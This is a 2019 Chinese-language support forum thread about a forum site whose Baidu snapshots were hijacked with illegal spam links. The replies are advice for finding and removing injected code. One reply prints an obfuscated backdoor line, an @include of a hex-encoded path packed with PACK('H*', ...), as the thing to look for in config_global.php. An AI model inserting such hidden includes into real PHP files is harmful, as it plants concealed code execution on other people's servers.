求助升级最新版网站被非法内容劫持百度快照

ghz0433 · 发表于 2019-8-26 19:29:42

我这个站www.3811111.com前几天才上传的6.22最新版
昨天发现百度收录出现很多违法信息快照，以帖子好链接形式出现，门户的链接也出现，数字没有那么大，因为网站没有那么多帖子，搞不懂是咋回事了，换了一个服务器还是一样

我知道答案回答被采纳将会获得1 贡献已有9人回答

苹果 · 发表于 2019-8-26 19:53:41

哥们儿你网站被域名劫持了找个懂的人给你看看吧。

屏幕快照 2019-08-26 下午7.53.18.png

苹果 · 发表于 2019-8-26 19:55:11

点击进入这个网站

allthebest · 发表于 2019-8-26 20:19:30

config下的config_global.php文件，找找恶意代码,如：

@include(PACK('H*','443A2F777777726F6F742F78676C6C2E636F6D2F75706C6F61642F696E7374616C6C2F696E636C7564652F696E7374616C6C5F63696E74656E2E706870'));

近似的字符，直接删除

更新缓存

ghz0433 · 发表于 2019-8-27 09:10:44

allthebest 发表于 2019-8-26 20:19
config下的config_global.php文件，找找恶意代码,如：

@include(PACK('H*','443A2F777777726F6F742F78676 ...

谢谢，我重新更换了服务器，备份数据库下载最新的程序恢复，还是不行现在服务器爬满了蜘蛛，蜘蛛爬那些链接都是数字很大的，说明根本不是爬我论坛的帖子

allthebest · 发表于 2019-8-27 16:05:52

ghz0433 发表于 2019-8-27 00:10
谢谢，我重新更换了服务器，备份数据库下载最新的程序恢复，还是不行现在服务器爬满了蜘蛛，蜘蛛爬那些链 ...

这与config下的config_global.php文件有关，检查权限设置

Fox · 发表于 2019-8-27 17:47:20

提示: 作者被禁止或删除内容自动屏蔽

高二天 · 发表于 2019-10-17 11:52:31

allthebest 发表于 2019-8-26 20:19
config下的config_global.php文件，找找恶意代码,如：

@include(PACK('H*','443A2F777777726F6F742F78676 ...

一万个赞！！！我跟楼主也一样的
看到里面有@clude的这串代码
请问还有哪些目录呢？一起处理

crx349 · 发表于 2019-10-17 15:25:21

高二天发表于 2019-10-17 11:52
一万个赞！！！我跟楼主也一样的
看到里面有@clude的这串代码
请问还有哪些目录呢？一起处理 ...

建议官方文件恢复下比较快

耗子 · 发表于 2019-10-17 15:50:01

木马问题不是在程序本身，而是服务器的权限，是某种的木马伪装成图片通过上传头像帖子等方式就上传到你服务器上了，要命的是你服务器还允许执行，
单纯的清理木马没用的要服务器的安全最主要
您可以加我QQ交谈，有偿服务，专业清理+安防

[求助] 求助升级最新版网站被非法内容劫持百度快照

产品服务

开发者服务

使用教程